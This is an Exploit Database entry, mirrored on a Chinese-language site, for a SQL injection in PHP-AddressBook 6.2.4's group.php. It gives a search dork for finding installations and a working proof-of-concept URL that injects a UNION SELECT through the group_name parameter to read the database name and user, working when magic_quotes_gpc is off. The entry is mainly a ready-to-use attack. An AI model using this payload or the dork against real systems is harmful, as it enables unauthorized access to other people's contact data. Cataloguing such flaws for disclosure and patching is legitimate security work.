PHP-AddressBook 6.2.4 – ‘group.php’ SQL Injection

• Exploit Database
• 34 阅读

• 作者： hiphop
  日期： 2010-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15848/

• #Exploit Title:PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
  #Script : PHP-AddressBook v6.2.4
  #Language : PHP
  #DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
  #Download : http://php-addressbook.sourceforge.net/download
  #DORK: "php-addressbook"
  #Date : 2010/12/29
  #Found: by hiphop
  #thanks :silly3r
  
  
  proof of concept:
  
  Condition: magic_quotes_gpc = off
  
  http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'